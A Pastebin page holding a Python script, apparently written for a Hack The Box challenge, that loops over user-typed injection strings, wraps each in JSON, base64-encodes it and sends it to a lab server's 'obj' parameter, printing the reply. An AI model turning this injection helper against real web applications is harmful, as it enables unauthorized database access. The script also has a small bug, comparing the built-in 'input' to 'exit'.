API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 18th, 2020
140
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.18 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python3
  2.  
  3. #requests is a good python way for us to get the page and manipulate web requests
  4. import requests
  5. #our hint at the bottom of the page says that we may need to be performing some base64 encoding
  6. import base64
  7. #parse out all the html and just show us content, makes usage of the program a little easier
  8. from bs4 import BeautifulSoup
  9. #used to get arguments and exit using system function
  10. import sys
  11. #library to help us close the program if keyboard interrupt is pressed
  12. import signal
  13. #check if proper number of arguments are given
  14. if (input == "exit"):
  15. print("Goodbye")
  16. sys.exit()
  17.  
  18. if (len(sys.argv) != 2):
  19. #basic string formatting
  20. print("Usage: {} <port number>".format(sys.argv[0]))
  21. #tell system to exit the program
  22. sys.exit()
  23.  
  24. #make a function to kill our infinite program when ctrl + c is pressed
  25. def keyboardInterruptHandler(signal,frame):
  26. print("\nKeyboardInterrupt detected. Exiting...")
  27. sys.exit()
  28. #use the signal library to detect the press, and execute our handler
  29. signal.signal(signal.SIGINT, keyboardInterruptHandler)
  30. #set port to whatever argv 1 was
  31. port = sys.argv[1]
  32. #infinite loop for injections to never stop
  33. while True:
  34. try:
  35. #get injection input from user
  36. oofValue = input("Query for ID param here: ")
  37. #create an unencoded utf styled object, adding our payload from the user input in
  38. payloadStringUnencoded = '{\"ID\":\"' + oofValue + '\"}'
  39. #base 64 encode the string after it has been transformed into a bytes object
  40. payloadStringEncoded = base64.b64encode(bytes(payloadStringUnencoded, encoding='ascii'))
  41. #final payload that is re encoded back into utf-8
  42. finalPayload = payloadStringEncoded.decode("utf-8")
  43. #injection url, rigged with the port number and our payload
  44. requestURL = "http://docker.hackthebox.eu:{0}/index.php?obj={1}".format(port,finalPayload)
  45. #go get the juicy data
  46. requestObject = requests.get(url = requestURL)
  47. #return it as pure html, this way we can just pull all the weird info
  48. pageToParse = requestObject.text
  49. #parse out valid string content using BeautifulSoup
  50. outData = BeautifulSoup(pageToParse, 'lxml')
  51. print(outData.text.strip())
  52. except:
  53. print("Connection refused, check your port")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!